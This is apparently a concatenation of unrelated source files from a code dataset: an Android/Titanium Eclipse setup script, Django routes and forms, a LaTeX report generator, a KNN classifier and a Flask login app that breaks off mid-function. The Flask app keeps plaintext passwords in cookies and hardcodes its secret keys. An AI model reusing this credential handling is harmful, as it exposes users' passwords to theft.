dot_project="""<?xml version="1.0" encoding="UTF-8"?>
<projectDescription>
<name>[PROJECT_NAME]</name>
<comment></comment>
<projects>
</projects>
<buildSpec>
<buildCommand>
<name>com.android.ide.eclipse.adt.ResourceManagerBuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>com.android.ide.eclipse.adt.PreCompilerBuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>org.eclipse.jdt.core.javabuilder</name>
<arguments>
</arguments>
</buildCommand>
<buildCommand>
<name>com.android.ide.eclipse.adt.ApkBuilder</name>
<arguments>
</arguments>
</buildCommand>
</buildSpec>
<natures>
<nature>com.android.ide.eclipse.adt.AndroidNature</nature>
<nature>org.eclipse.jdt.core.javanature</nature>
</natures>
</projectDescription>
"""
# Locate this script, make its folder importable, and load helpers/settings.
this_path = os.path.abspath(os.path.dirname(__file__))
sys.path.append(this_path)
try:
    import ticommon
except Exception as err:
    # Fix: 'err' was previously never bound (bare 'except:'), so this error
    # path raised a NameError instead of printing the message. Also dropped
    # a stray '&' from the format string.
    print >> sys.stderr, "[ERROR] Couldn't load ticommon from %s. It should be sitting side-by-side with this script. Message: %s." % (this_path, err)
    sys.exit(1)

############## DEFAULTS ########################
# Put a file named tidevtools_settings.py in the
# same folder as this file, then you can override this
TIMOBILE_SRC = ''
#################################################

# Optional user settings file may override TIMOBILE_SRC above.
if os.path.exists(os.path.join(this_path, 'tidevtools_settings.py')):
    execfile(os.path.join(this_path, 'tidevtools_settings.py'))
if not os.path.exists(TIMOBILE_SRC):
    print >> sys.stderr, "[ERROR] Could not locate the Titanium Mobile SDK sources. Please create a 'tidevtools_settings.py' in the same folder as this script file and add a string variable named TIMOBILE_SRC which is set to the path where the Titanium Mobile SDK sources are located."
    sys.exit(1)
# Make the SDK's Android support tooling importable (provides tilogger).
sys.path.append(os.path.join(TIMOBILE_SRC, "support", "android"))
from tilogger import *
log = TiLogger(None, level=TiLogger.INFO)
# Sanity checks: must be run from the top of a Titanium project that has
# been built at least once with Titanium Studio.
if not os.path.exists('tiapp.xml'):
    log.error("I don't see any tiapp.xml file here. \nLooks like \n%s \nis not a Titanium project folder. Exiting..." % os.getcwd())
    sys.exit(1)
resources_folder = os.path.join('.', 'Resources')
if not os.path.exists(resources_folder):
    log.error("Couldn't find a Resources folder here.")
    sys.exit(1)
resources_android_folder = os.path.join(resources_folder, 'android')
android_folder = os.path.join('.', 'build', 'android')
assets_folder = os.path.join(android_folder, 'assets')
bin_assets_folder = os.path.join(android_folder, "bin", "assets")
libs_folder = os.path.join(android_folder, "libs")
required_folders = (android_folder,
                    os.path.join(assets_folder),
                    os.path.join(android_folder, "res"),
                    os.path.join(android_folder, "gen"))
for required in required_folders:
    if not os.path.exists(required):
        log.error("You need to build your project one time with Titanium Studio before 'eclipsifying' it.")
        sys.exit(1)
# For V8, copy required native libraries to libs/
if not os.path.exists(libs_folder):
    os.makedirs(libs_folder)
""" Apparently not required anymore
src_libs_dir = os.path.join(TIMOBILE_SRC, "dist", "android", "libs")
if os.path.exists(src_libs_dir):
for root, dirs, files in os.walk(src_libs_dir):
for filename in files:
full_path = os.path.join(root, filename)
rel_path = os.path.relpath(full_path, src_libs_dir)
dest_file = os.path.join(os.path.abspath(libs_folder), rel_path)
if not os.path.exists(dest_file):
if not os.path.exists(os.path.dirname(dest_file)):
os.makedirs(os.path.dirname(dest_file))
shutil.copyfile(full_path, dest_file)
"""
# Read the app id/name from tiapp.xml and move R.java from src/ into gen/,
# since Eclipse/ADT expects generated sources under gen/.
app_info = ticommon.get_app_info('.')
appid = app_info["id"]
project_name = app_info["name"]
gen_folder = os.path.join(android_folder, 'gen', ticommon.appid_to_path(appid))
if not os.path.exists(gen_folder):
    os.makedirs(gen_folder)
src_folder = os.path.abspath(os.path.join(android_folder, 'src', ticommon.appid_to_path(appid)))
r_file = os.path.join(src_folder, 'R.java')
if os.path.exists(r_file):
    shutil.copyfile(r_file, os.path.join(gen_folder, 'R.java'))
    os.remove(r_file)
# put everything that's in gen/, except R.java, into src/. Eclipse (or the ADT plugin, whatever)
# likes to cleanout the gen/ folder when building, which is really annoying when suddenly all of
# our generated classes disappear.
gen_files = [x for x in os.listdir(gen_folder) if x != 'R.java' and x.endswith('.java')]
if gen_files:
    if not os.path.exists(src_folder):
        os.makedirs(src_folder)
    for one_gen_file in gen_files:
        shutil.copyfile(os.path.join(gen_folder, one_gen_file), os.path.join(src_folder, one_gen_file))
        os.remove(os.path.join(gen_folder, one_gen_file))
# Get rid of calls to TiVerify in the Application.java
application_java = [f for f in gen_files if f.endswith("Application.java")]
if application_java:
    application_java = os.path.abspath(os.path.join(src_folder, application_java[0]))
    lines = open(application_java, 'r').readlines()
    lines = [l for l in lines if "TiVerify" not in l and "verify.verify" not in l]
    open(application_java, "w").write("".join(lines))
# To avoid the Android 2373 warning, set special property in AppInfo.java
appinfo_java = [f for f in gen_files if f.endswith("AppInfo.java")]
if appinfo_java:
    appinfo_java = os.path.abspath(os.path.join(src_folder, appinfo_java[0]))
    lines = open(appinfo_java, 'r').readlines()
    lines_out = []
    for l in lines:
        if l.endswith("app.getAppProperties();\n"):
            lines_out.append(l)
            # Inject the bug-2373 workaround right after the properties fetch.
            lines_out.append('\t\t\t\t\tproperties.setBool("ti.android.bug2373.disableDetection", true);\n')
            lines_out.append('\t\t\t\t\tappProperties.setBool("ti.android.bug2373.disableDetection", true);\n')
        else:
            lines_out.append(l)
    with open(appinfo_java, 'w') as f:
        f.write("".join(lines_out))
# Remove all code for starting up the Javascript debugger.
# NOTE(review): this drops every line whose lowercased text contains "debug",
# a very broad filter — confirm it cannot remove unrelated code.
if application_java:
    lines = open(application_java, 'r').readlines()
    lines = [l for l in lines if "debug" not in l.lower()]
    open(application_java, "w").write("".join(lines))
# if bin/assets/app.json is there, copy it to assets/app.json
if os.path.exists(os.path.join(bin_assets_folder, "app.json")):
    shutil.copyfile(os.path.join(bin_assets_folder, "app.json"), os.path.join(assets_folder, "app.json"))
# if bin/assets/index.json is there, copy it to assets/index.json
if os.path.exists(os.path.join(bin_assets_folder, "index.json")):
    shutil.copyfile(os.path.join(bin_assets_folder, "index.json"), os.path.join(assets_folder, "index.json"))
# Link (or copy, on Windows) the project's Resources and tiapp.xml into the
# Android assets folder so Eclipse builds see them.
if ticommon.is_windows():
    log.info("Copying Resources and tiapp.xml to assets folder because you're running Windows and therefore we're not going to make symlinks")
    shutil.copytree(resources_folder, os.path.join(assets_folder, 'Resources'))
    shutil.copy(os.path.join('.', 'tiapp.xml'), assets_folder)
else:
    resources_dest = os.path.abspath(os.path.join(assets_folder, 'Resources'))
    tiapp_dest = os.path.abspath(os.path.join(assets_folder, 'tiapp.xml'))
    if not os.path.exists(resources_dest):
        os.symlink(os.path.abspath(resources_folder), resources_dest)
    if not os.path.exists(tiapp_dest):
        os.symlink(os.path.abspath(os.path.join('.', 'tiapp.xml')), tiapp_dest)
    # Also link each platform-specific entry under Resources/android into the
    # linked Resources folder.
    if os.path.exists(resources_android_folder):
        res_android_files = os.listdir(resources_android_folder)
        if res_android_files:
            for one_res_android_file in res_android_files:
                one_res_android_file_dest = os.path.join(resources_dest, one_res_android_file)
                log.info(one_res_android_file_dest)
                if not os.path.exists(one_res_android_file_dest):
                    one_res_android_file_src = os.path.abspath(os.path.join(resources_android_folder, one_res_android_file))
                    #log.info("sym: " + one_res_android_file_dest + ' -> ' + one_res_android_file_src)
                    os.symlink(one_res_android_file_src, one_res_android_file_dest)
# put debuggable=true in Android manifest so you can do device debugging.
import codecs, re
f = codecs.open(os.path.join(android_folder, 'AndroidManifest.xml'), 'r', 'utf-8')
xml = f.read()
f.close()
xml = re.sub(r'android\:debuggable="false"', 'android:debuggable="true"', xml)
f = codecs.open(os.path.join(android_folder, 'AndroidManifest.xml'), 'w', 'utf-8')
f.write(xml)
# Get the modules used in the application
import xml.etree.ElementTree as ET
tree = ET.parse(os.path.join('.', 'tiapp.xml'))
root = tree.getroot()
modules = root.findall(".//modules/module[@platform='android']")
dot_classpath_entries = []
for module in modules:
    module_name = module.text
    module_version = module.get('version')
    module_path = os.path.join('.', 'modules', 'android', module_name, module_version)
    module_jar_name = module_name.rsplit('.', 1)[1] + '.jar'
    module_jar_path = os.path.abspath(os.path.join(module_path, module_jar_name))
    #log.info(module_name + ': ' + module_version + ' | ' + module_jar_name)
    #log.info(module_jar_path)
    dot_classpath_entries.append(' <classpathentry exported="true" kind="lib" path="' + module_jar_path + '"/>')
    module_lib_path = os.path.join(module_path, 'lib')
    if os.path.exists(module_lib_path):
        module_lib_jars = os.listdir(module_lib_path)
        for module_lib_jar in module_lib_jars:
            module_lib_jar_path = os.path.abspath(os.path.join(module_lib_path, module_lib_jar))
            dot_classpath_entries.append(' <classpathentry exported="true" kind="lib" path="' + module_lib_jar_path + '"/>')
    module_libs_dir = os.path.join(module_path, "libs")
    if os.path.exists(module_libs_dir):
        # NOTE(review): this loop rebinds 'root' (the ElementTree root above);
        # harmless today because 'root' is not used afterwards, but fragile.
        for root, dirs, files in os.walk(module_libs_dir):
            for filename in files:
                full_path = os.path.join(root, filename)
                rel_path = os.path.relpath(full_path, module_libs_dir)
                dest_file = os.path.join(os.path.abspath(libs_folder), rel_path)
                if not os.path.exists(dest_file):
                    if not os.path.exists(os.path.dirname(dest_file)):
                        os.makedirs(os.path.dirname(dest_file))
                    shutil.copyfile(full_path, dest_file)
# Write the required Eclipse/ADT .project, .classpath and project.properties files.
f = codecs.open(os.path.join(android_folder, ".classpath"), "w")
dot_classpath = ''.join([dot_classpath_part1, '\n'.join(dot_classpath_entries), dot_classpath_part2])
f.write(dot_classpath)
f.close()
f = codecs.open(os.path.join(android_folder, ".project"), "w")
f.write(dot_project.replace("[PROJECT_NAME]", project_name))
f.close()
f = codecs.open(os.path.join(android_folder, "project.properties"), "w")
f.write(project_properties)
f.close()
# Fixup Android library project paths in project.properties
props_file = os.path.join(android_folder, "project.properties")
f = codecs.open(props_file, 'r', 'utf-8')
lines = f.readlines()
newlines = []
f.close()
for line in lines:
    if not line.startswith('android.library.reference'):
        newlines.append(line)
        continue
    # Special case: the titanium module is only one folder
    # down from "android" (other modules are two folders down)
    titanium_module = "android%stitanium" % os.sep
    if line.strip().endswith(titanium_module):
        rel_path = titanium_module
    else:
        rel_path = os.sep.join(line.strip().split(os.sep)[-3:])
    if not rel_path.startswith("android"):
        newlines.append(line)
        continue
    full_path = os.path.join(TIMOBILE_SRC, rel_path)
    if not os.path.exists(full_path):
        newlines.append(line)
        continue
    # Rewrite the reference as a path relative to build/android.
    newlines.append("%s=%s\n" % (line.split("=")[0], os.path.relpath(full_path, android_folder)))
f = codecs.open(props_file, 'w', 'utf-8')
f.write("".join(newlines))
f.close()
|
23,413 | dadc72614db315e1f1573262990b06851f305a61 | from django.urls import path
from . import views
from personal.views import (
home_screen_view,
)
from account.views import (ActivateAccount, ResendActivationEmail, VerifyNewEmail, ChangeEmail, )
app_name = 'sni_app'

# Route table: public conference pages plus account activation and
# email-verification endpoints served by views from the account app.
urlpatterns = [
    path('', views.home, name='sni_home'),
    path('schedule', views.schedule, name='schedule'),
    # path('synergyhub', views.synergy_hub, name='synergy-hub'),
    path('about', views.about, name='about'),
    path('organizer', views.organizer, name='organizer'),
    path('speakers', views.speakers, name='speakers'),
    path('sponsors', views.sponsors, name='sponsors'),
    path('venue', views.venue, name='venue'),
    path('resend_activation_email/<uidb64>/<token>/<target>', ResendActivationEmail.as_view(), name='resend'),
    path('activate/<uidb64>/<token>', ActivateAccount.as_view(), name='activate'),
    path('verify_new_email/<uidb64>/<token>/<to>', VerifyNewEmail.as_view(), name='verify_new_email'),
    path('email_change', ChangeEmail.as_view(), name='email_change'),
    #
    # path('deactivate_account', DeactivateAccount.as_view(), name='deactivate_account'),
    # path('deactivate_account/verify/<uidb64>/<token>', VerifyDeactivateAccount.as_view(), name='verify_deactivate_account'),
]
|
23,414 | 25571139c06dea0d14689e55edee7808955faf8c | #!/bin/env python
################################################################################
#
# file : LatexGenerator.py
#
# author: Lakshmi Manohar Rao Velicheti - lveliche@iupui.edu
#
################################################################################
from ..ReportGenerator import ReportGenerator
from ..DataAbstractions import *
from ..Tool import Tool
from .. import Utilities
from lxml import etree
import urllib.request
import zipfile
import io
import logging
import statistics
import sys
from collections import defaultdict
class Organizer:
    """Groups truth and build result sets by file, function, or line.

    Results are stored in a recursively auto-vivifying dict keyed by
    weakness name / suite directory / filename (and optionally function and
    line, depending on the chosen grainularity).
    """

    class Grainularity (Enum) :
        # Grouping levels, coarsest to finest.
        FILENAME = 0
        FUNCTION = 1
        LINE = 2

    def __init__ (self, grainularity, truth, build):
        self.grainularity = grainularity
        self.truth_rs = truth
        self.build_rs = build
        # shamelessly stolen from:
        # http://stackoverflow.com/questions/16724788/how-can-i-get-python-to-automatically-create-missing-key-value-pairs-in-a-dictio
        # Recursive dictionary factory, automatically creates directory keys if they do
        # not exist. Default values are dicts. i.e. nested_dict[1][2][3] will automatically
        # create a structure like {1: {2: {3: {}}}
        nested_dict = lambda: defaultdict(nested_dict)
        self.data = nested_dict ()

    def organize (self):
        """Group both result sets into self.data."""
        self._group (self.truth_rs)
        self._group (self.build_rs)

    def _group (self, result_set):
        """Fold every flaw and bug of result_set into the nested data dict."""
        for weakness in result_set.weaknesses ():
            for suite in weakness.suites:
                # Handle the flaws
                for flaw in suite.flaws:
                    # Find the target, this will create the necessary keys if required
                    target = self._get_target (weakness, suite, flaw)
                    if not target:
                        # First time seeing this file/fuction/line, need to set its value
                        newdict = self._get_default_data (weakness, suite, flaw)
                        target.update (newdict)
                    else:
                        target['flaws'].append (flaw)
                # Handle the bugs
                for bug in suite.bugs:
                    # Find the target, this will create the necessary keys if required
                    target = self._get_target (weakness, suite, bug)
                    if not target:
                        # First time seeing this file/fuction/line, need to set its value
                        newdict = self._get_default_data (weakness, suite, bug)
                        target.update (newdict)
                    else:
                        target['bugs'].append (bug)

    #
    # Get the appropriate target based on the grainularity
    #
    def _get_target (self, weakness, suite, obj):
        # Indexing auto-creates intermediate dicts (defaultdict factory above).
        if self.grainularity == Organizer.Grainularity.FILENAME:
            return self.data[weakness.name][suite.directory][obj.filename]
        elif self.grainularity == Organizer.Grainularity.FUNCTION:
            return self.data[weakness.name][suite.directory][obj.filename][obj.function]
        else:
            return self.data[weakness.name][suite.directory][obj.filename][obj.function][obj.line]

    #
    # Make the default data dictionary based on the object provided
    #
    def _get_default_data (self, weakness, suite, obj):
        # We always have flaws, bugs, weakness, directory, and filename
        result = {'flaws': [], 'bugs': [], 'weakness': weakness.name, 'directory': suite.directory,
                  'filename': obj.filename, 'function': '', 'line': ''}
        # Populate the function/line if we used that grainularity
        if self.grainularity == Organizer.Grainularity.FUNCTION:
            result['function'] = obj.function
        elif self.grainularity == Organizer.Grainularity.LINE:
            result['function'] = obj.function
            result['line'] = obj.line
        # Append the provided object to the correct list
        if isinstance (obj, Bug):
            result['bugs'].append (obj)
        else:
            result['flaws'].append (obj)
        return result

    #
    # Find the leaves in the provided organized dictionary
    #
    def find_leaves (self, dictionary):
        # A leaf is recognized by its 'flaws' list (set by _get_default_data).
        if isinstance (dictionary.get ('flaws'), list):
            return [dictionary]
        result = []
        for key in dictionary.keys ():
            result.extend (self.find_leaves (dictionary.get (key)))
        return result
class DataPoint:
    """One evaluation data point: TP/FP/FN counts plus provenance metadata."""

    def __init__ (self):
        self.tp = 0          # true positives
        self.fp = 0          # false positives
        self.fn = 0          # false negatives
        self.weakness = None # weakness (CWE) name
        self.directory = None
        self.flaws = []      # expected flaws contributing to this point
        self.bugs = []       # tool-reported bugs contributing to this point
        self.tool = None     # name of the analyzed tool's result set
        self.truth = None    # name of the ground-truth result set

    def precision (self):
        """Return tp / (tp + fp), or 0 when the tool reported nothing."""
        try:
            return self.tp / (self.tp + self.fp * 1.0)
        except ZeroDivisionError:
            # Narrowed from 'except Exception', which could mask real bugs.
            return 0

    def recall (self):
        """Return tp / (tp + fn), or 0 when no flaws were expected."""
        try:
            return self.tp / (self.tp + self.fn * 1.0)
        except ZeroDivisionError:
            return 0
#
# Factory for Report Generation
# @returns LatexGenerator object
#
def __create__():
    """Factory hook used by the report-generator loader; returns a fresh LatexGenerator."""
    return LatexGenerator()
#
# Concrete class - PDFLatexGenerator
#
class LatexGenerator(ReportGenerator):
    """Report generator that renders SCATE evaluation results as LaTeX.

    NOTE(review): this class uses 'os' but the visible import header does not
    import it — presumably it arrives via the star import; confirm.
    """

    #
    # Initialize the parser
    #
    @staticmethod
    def init_parser (parser):
        latex_parser = parser.add_parser ('latex', help='Convert evidence into a latex file')
        latex_parser.set_defaults (generator=LatexGenerator)

    #
    # Initalize the generator
    #
    def parse_args (self, args):
        # Call the base class (Command) init
        super (LatexGenerator, self).parse_args (args)
        self.pages = []
        self.appendix = None
        self.load_pages ()

    #
    # Load the pages
    #
    def load_pages (self):
        # Some pages are repeated per grainularity (i.e. Summary). These should
        # be in the correct order.
        page_order = ['Methodology', 'Summary', 'Detail']
        script_path = os.path.dirname (os.path.abspath (sys.argv[0]))
        for cls in Utilities.import_classes (script_path, 'lib/ReportGenerators/LatexPages', 'name'):
            if cls.name () == 'Appendix':
                self.appendix = cls ()
            elif cls.name () in page_order:
                # Insert at the page_order index to keep a stable ordering.
                self.pages.insert (page_order.index (cls.name ()), cls ())
            else:
                logging.warning ("WARNING: Found unexpected Latex Page [%s], skipping..." % cls.name ())
        logging.debug ('Loaded LatexPages [%s]' % self.pages)

    #
    # Generate Report of respective type
    #
    def generate (self, truth, build):
        """Write one report per grouping granularity (file, function, line)."""
        # Construct the appropriate Tool object which was used for the build
        self.tool = self.get_tool (build)()
        # The same appendix is used for each permutation, so we initalize
        # and finialize it here instead of in write_report
        self.appendix.parse_args (build.GetSource ())
        logging.info ('Generating report based on filename')
        self.write_report (truth, build, Organizer.Grainularity.FILENAME)
        logging.info ('Generating report based on function')
        self.write_report (truth, build, Organizer.Grainularity.FUNCTION)
        logging.info ('Generating report based on line')
        self.write_report (truth, build, Organizer.Grainularity.LINE)
        self.appendix.fini ()

    def write_report (self, truth, build, grainularity):
        """Group results at the given granularity and emit the .tex files."""
        # Organize the truth and build result sets
        organizer = Organizer (grainularity,
                               truth,
                               build)
        organizer.organize ()
        # We create two permutations for each grainularity:
        # One where Bugs with wrong checkers count as false postives ([tool].[grainularity].tex)
        # One where Bugs with wrong checkers don't count as false positives ([tool].[grainularity].skip.tex)
        permutations = [('%s.%s.tex' % (build.GetSource (), str (grainularity).split ('.')[-1]), True),
                        ('%s.%s.skip.tex' % (build.GetSource (), str (grainularity).split ('.')[-1]), False)]
        for (filename, wrong_checker_fp) in permutations:
            # Initalize the pages
            for page in self.pages:
                page.parse_args (organizer, wrong_checker_fp)
            # Get the leaves
            for data in organizer.find_leaves (organizer.data):
                # Build datapoint
                datapoint = self.build_datapoint (organizer, data, wrong_checker_fp)
                # If there are 0 expected flaws, don't report on this datapoint.
                # This can happen when there are only incidental flaws for
                # the grainularity (i.e. line-based reporting where a line
                # only has an incidental flaw)
                if (0 == datapoint.tp + datapoint.fn):
                    logging.debug ('Skipping datapoint with 0 expected flaws')
                    continue
                self.appendix.visit (datapoint)
                for page in self.pages:
                    page.visit (datapoint)
            # Write the main report page
            # NOTE(review): outfile is never explicitly closed — confirm this
            # is acceptable (buffered output flushed at interpreter exit).
            outfile = open (filename, 'w')
            self.init_latex (outfile, build.GetSource (), truth.GetSource ())
            # Finialize the pages
            for page in self.pages:
                self.include_page (outfile, page)
                page.fini ()
            self.include_page (outfile, self.appendix)
            self.fini_latex (outfile)

    #
    # Build a datapoint from the provided data structure
    #
    def build_datapoint (self, organizer, data, wrong_checker_is_fp):
        # Get the probability matrix
        (tp, fp, fn) = self.compute_probability (data, wrong_checker_is_fp)
        # Build a data point
        result = DataPoint ()
        result.tp = tp
        result.fp = fp
        result.fn = fn
        result.weakness = data['weakness']
        result.directory = data['directory']
        result.flaws = data['flaws']
        result.bugs = data['bugs']
        result.tool = organizer.build_rs.GetName ()
        result.truth = organizer.truth_rs.GetName ()
        return result

    #
    # Compute the probability matrix from the provided data
    #
    def compute_probability (self, data, wrong_checker_is_fp):
        # Build a list of incidental CWEs which appear in the data
        incidentals = [f for f in data['flaws'] if f.severity == FlawType.INCIDENTAL]
        incidental_cwes = set ()
        for flaw in incidentals:
            cwe = flaw.description.replace (' ', '')
            if cwe.startswith ('CWE'):
                # NOTE(review): 'cwe[:6]' keeps "CWE" + 3 digits — assumes
                # 3-digit CWE ids; confirm for shorter/longer ids.
                incidental_cwes.add (cwe[:6])
        right_checker = 0
        wrong_checker = 0
        # Check the bugs to see if they have the right or wrong checker
        for bug in data['bugs']:
            if self.tool.correct_checker (bug, data['weakness']):
                right_checker += 1
            else:
                # Check for true positives on incidental flaws
                found_incidental = False
                for cwe in incidental_cwes:
                    if self.tool.correct_checker (bug, cwe):
                        found_incidental = True
                if not found_incidental:
                    wrong_checker += 1
        # Compute the TP/FP/FN probability matrix
        tp = 0
        fp = 0
        fn = 0
        expected = 0
        if wrong_checker_is_fp:
            fp += wrong_checker
        # Correct checkers in good functions are false positives
        if 'good' in data['function']:
            fp += right_checker
        else:
            tp += right_checker
        # Expected flaws exclude fixes and incidentals.
        expected = len ([f for f in data['flaws'] if f.severity != FlawType.FIX
                         and f.severity != FlawType.INCIDENTAL])
        if tp > expected:
            fp += tp - expected
            tp = expected
        else:
            # The tool didn't find some of the expected flaws
            fn = expected - tp
        return (tp, fp, fn)

    #
    # Write the generic portion of the latex report
    #
    def init_latex (self, fp, tool_name, truth_name):
        fp.write ('\\documentclass[12pt]{report}\n\\usepackage{graphicx}\n\\usepackage{xcolor}\n\\usepackage[framemethod=tikz]{mdframed}\n\\usepackage{hyperref}')
        fp.write ('\n\\usepackage{longtable}\n\\usepackage{multirow}\n\\usepackage[toc,page]{appendix}')
        fp.write ('\n\\title{SCATE Report for %s Against %s}' % (tool_name, truth_name))#(self.__title__))
        fp.write('\n\\begin{document}\n\maketitle')
        fp.write('\n\\renewcommand\\thesection{\Roman{section}} \n')
        fp.write('\n\\setcounter{tocdepth}{1}\n\\tableofcontents\n\\newpage\n')

    #
    # Include page in the report
    #
    def include_page (self, fp, page):
        fp.write ('\\input{%s}\n' % page.tex_name ())

    #
    # Finish the latex report
    #
    def fini_latex (self, fp):
        fp.write('\n\\end{document}')

    #
    # Get the correct tool object from the provided result set
    #
    def get_tool (self, rs):
        for tool in Utilities.get_tools ():
            if rs.GetSource () == tool.name ():
                logging.debug ('Using tool [%s]' % tool)
                return tool
        logging.error ('ERROR: Unable to find tool for source [%s]' % rs.GetSource ())
        sys.exit (1)
|
23,415 | 1507207d0acc995cf219664c2e2e7fe16bd9f492 | import os
# import matplotlib as mpl
# import matplotlib.pyplot as plt
import pandas as pd
import numpy as np
from joblib import dump, load
from PIL import Image
from skimage.feature import hog
from skimage.color import rgb2grey
from sklearn.model_selection import train_test_split
from sklearn.metrics import accuracy_score
from sklearn.preprocessing import StandardScaler
from sklearn.decomposition import PCA
from sklearn.svm import SVC
from sklearn.neighbors import KNeighborsClassifier
from keras.utils import to_categorical
def fd_hu_moments(image):
    """Return the seven Hu moment invariants of an image as a flat vector.

    NOTE(review): this function uses cv2, but no 'import cv2' appears
    anywhere in this file — calling it as-is raises NameError. Confirm the
    missing import (the function appears unused below).
    """
    image = cv2.cvtColor(image, cv2.COLOR_BGR2GRAY)
    feature = cv2.HuMoments(cv2.moments(image)).flatten()
    return feature
# Build gesture-name <-> class-index lookup tables from the sub-folder names
# of subject 00 (one folder per gesture).
images_done = 0
lookup = dict()
reverselookup = dict()
count = 0
for j in os.listdir('../leapGestRecog/00/'):
    if not j.startswith('.'): # If running this code locally, this is to
        # ensure you aren't reading in hidden folders
        lookup[j] = count
        reverselookup[count] = j
        count = count + 1
lookup  # no-op outside a notebook; kept from the original notebook cell
'''
x_data = []
y_data = []
datacount = 0 # We'll use this to tally how many images are in our dataset
for i in range(0, 10): # Loop over the ten top-level folders
for j in os.listdir('../leapGestRecog/0' + str(i) + '/'):
if not j.startswith('.'): # Again avoid hidden folders
count = 0 # To tally images of a given gesture
for k in os.listdir('../leapGestRecog/0' +
str(i) + '/' + j + '/'):
# Loop over the images
img = Image.open('../leapGestRecog/0' +
str(i) + '/' + j + '/' + k).convert('L')
# Read in and convert to greyscale
img = img.resize((320, 120))
arr = np.array(img)
grey_img = rgb2grey(arr)
hog_features = hog(grey_img, block_norm='L2-Hys', pixels_per_cell=(16, 16))
x_data.append(hog_features)
count = count + 1
images_done = images_done + 1
print('../leapGestRecog/0' + str(i) + '/' + str(j) + '/' + str(k) + ' DONE!', str(images_done)+'/20000')
y_values = np.full((count, 1), lookup[j])
y_data.append(y_values)
datacount = datacount + count
x_data = np.array(x_data, dtype = 'float32')
ss = StandardScaler()
x_data = ss.fit_transform(x_data)
pca = PCA(n_components=500)
x_data = pca.fit_transform(x_data)
y_data = np.array(y_data)
y_data = y_data.reshape(datacount, 1) # Reshape to be the correct size
np.save('samples', x_data)
np.save('labels', y_data)'''
# Load the pre-extracted HOG+PCA features and labels that the commented-out
# pipeline above produced, then train/evaluate a 5-NN classifier.
x_data = np.load('samples.npy')
y_data = np.load('labels.npy')
# y_data = to_categorical(y_data)
# y_data = y_data.reshape(20000, 10)
# x_data = x_data.reshape((20000, 120, 320, 1))
# x_data /= 255
x_train,x_test,y_train,y_test = train_test_split(x_data, y_data, test_size=0.2)
#x_validate,x_test,y_validate,y_test = train_test_split(x_further, y_further, test_size=0.5)
# clf = load('Model.joblib')
# NOTE(review): y_train is a column vector (n, 1); sklearn expects a 1-D
# array (y_train.ravel()) and will emit a DataConversionWarning — confirm.
clf = KNeighborsClassifier(n_neighbors=5)
clf.fit(x_train, y_train)
dump(clf, 'Model.joblib')
y_pred = clf.predict(x_test)
print("Accuracy: "+str(accuracy_score(y_test, y_pred)))
from sklearn.metrics import confusion_matrix
cm = confusion_matrix(y_test, y_pred)
print(cm)
|
def mul_by_2(num):
    """Return num multiplied by two."""
    doubled = num * 2
    return doubled
def mul_by_3(num):
    """Return num multiplied by three."""
    tripled = num * 3
    return tripled
|
23,417 | 2ae701ae17fae2aa3ebe1c2b0775b28d4db294d3 | from ..models import Pedido, Cliente, Produto
from django import forms
class PedidoForm(forms.ModelForm):
    """Form for creating/editing a Pedido (order)."""
    cliente = forms.ModelChoiceField(queryset=Cliente.objects.all()) # choice field populated with all Cliente instances
    observacoes = forms.CharField(widget=forms.Textarea) # textarea widget for the free-form notes input
    produto = forms.ModelMultipleChoiceField(queryset=Produto.objects.all()) # allows selecting more than one Produto instance

    class Meta:
        model = Pedido
        fields = ['cliente', 'data_pedido', 'valor', 'status', 'observacoes', 'produto']
23,418 | 9148d5b4ef81ea0620ca3ab603451260d9f5aacb | # flake8: noqa
"""
bad
bad bad
"""
is very bad
|
23,419 | 05fe945e0ccb67c51252634767798a1567a5a157 | #!flask/bin/python
from flask import render_template, flash, request, redirect, make_response, jsonify
from flask import Flask, url_for
from DbHandler import DBHandler
from flask_wtf import FlaskForm
from wtforms import StringField, PasswordField, BooleanField, SubmitField
from wtforms.validators import DataRequired
import sys
db_handler = DBHandler()
app = Flask(__name__)
app.config.update(dict(
SECRET_KEY="powerful secretkey",
WTF_CSRF_SECRET_KEY="a csrf secret key"
))
userLogged = dict()
cert = '/etc/letsencrypt/live/data4help.cloud/fullchain.pem'
key = '/etc/letsencrypt/live/data4help.cloud/privkey.pem'
class LoginForm(FlaskForm):
username = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
remember_me = BooleanField('Remember Me')
submit = SubmitField('Sign In')
class RegistrationForm(FlaskForm):
email = StringField('Username', validators=[DataRequired()])
password = PasswordField('Password', validators=[DataRequired()])
company_name = StringField('Company Name', validators=[DataRequired()])
submit = SubmitField('Sign Up')
def auth_user(cookie):
    """Return True iff the request cookies identify a registered third party.

    Compares the 'password' cookie against the stored password for the
    'email' cookie. Returns an explicit False when the email cookie is
    missing (the original implicitly returned None there; all callers only
    truth-test the result, so this is backward-compatible).

    NOTE(review): the password is stored and compared in plaintext via a
    cookie -- should be replaced by a signed session token.
    """
    email = cookie.get('email')
    if not email:
        return False
    return cookie.get('password') == db_handler.get_third_party_password(email)
def set_cookies(user, psw):
    """Render the private page and attach the email/password cookies to it.

    NOTE(review): the password is persisted client-side in plaintext.
    """
    page = render_template('private.html', title='Private page',
                           user={'username': user}, secret=get_secret(user))
    response = make_response(page)
    for cookie_name, cookie_value in (('email', user), ('password', psw)):
        response.set_cookie(cookie_name, cookie_value)
    print("cookie settato")
    return response
@app.route('/')
@app.route('/index')
def index():
    """Serve the public landing page at both '/' and '/index'."""
    return render_template('index.html', title='Home')
@app.route('/login', methods=['GET', 'POST'])
def login():
    """Show the login form; on a valid POST, authenticate and set cookies.

    NOTE(review): the password is compared in plaintext against the stored
    value, and the failed-login branch re-renders the form with
    title='OKKK' -- this looks like leftover debug text; confirm intent.
    """
    form = LoginForm()
    if form.validate_on_submit():
        if form.password.data == db_handler.get_third_party_password(form.username.data):
            return set_cookies(form.username.data, form.password.data)
        return render_template('login.html', title='OKKK', form=form)
    return render_template('login.html', title='Sign In', form=form)
@app.route('/registration', methods=['GET', 'POST'])
def registration():
    """Sign-up page: on a valid POST, register the third party and go home.

    NOTE(review): the password is handed to the DB layer as-is -- confirm
    it is hashed before storage.
    """
    form = RegistrationForm()
    if not form.validate_on_submit():
        return render_template('signup.html', title='Sign Up', form=form)
    db_handler.register_third_party(form.email.data, form.password.data, form.company_name.data)
    flash('Signup requested for user {}'.format(form.email.data))
    return redirect(url_for('index'))
@app.route('/private_page', methods=['GET', 'POST'])
def private_page():
